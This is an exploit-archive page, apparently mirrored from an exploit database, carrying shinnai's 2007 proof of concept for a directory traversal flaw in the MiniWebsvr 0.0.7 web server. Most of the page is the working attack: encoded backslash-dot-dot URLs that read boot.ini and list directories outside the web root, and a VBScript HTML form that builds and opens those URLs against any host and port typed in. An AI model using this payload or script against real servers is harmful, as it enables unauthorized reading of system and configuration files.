[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : MiniWebsvr 0.0.7 Remote Directory Transversal Exploit
# Published : 2007-04-11
# Author : shinnai
# Previous Title : Aircrack-ng 0.7 (specially crafted 802.11 packets) Remote BoF Exploit
# Next Title : Kerberos 1.5.1 Kadmind Remote Root Buffer Overflow Vulnerability
<pre>
<code><span style="font: 10pt Courier New;"><span class="general1-symbol">-------------------------------------------------------------
<b>MiniWebsvr 0.0.7 Directory transversal vulnerability</b>
url: http://miniwebsvr.sourceforge.net/
author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://shinnai.altervista.org
http://localhost/%5C..%5C..%5C..%5C..%5C..%5C../boot.ini or
http://localhost/%5C..%5C..%5C..%5C..%5C..%5C../
-------------------------------------------------------------
Host Port
<input type=text name=txtIP value = "localhost"> <input type=text name=txtPort value = "8080">
<input language=VBScript onclick=GetBoot() type=button value="Click to get boot.ini">
<input language=VBScript onclick=BrowseMe() type=button value="Click to browse">
<script language='vbscript'>
Sub GetBoot
on error resume next
document.location = "http://" + txtIP.value + ":" + txtPort.value + "/%5C..%5C..%5C..%5C..%5C..%5C../boot.ini"
end sub
Sub BrowseMe
on error resume next
document.location = "http://" + txtIP.value + ":" + txtPort.value + "/%5C..%5C..%5C..%5C..%5C..%5C../"
end sub
</script>
</span></span>
</code></pre>
# www.Syue.com [2007-04-11]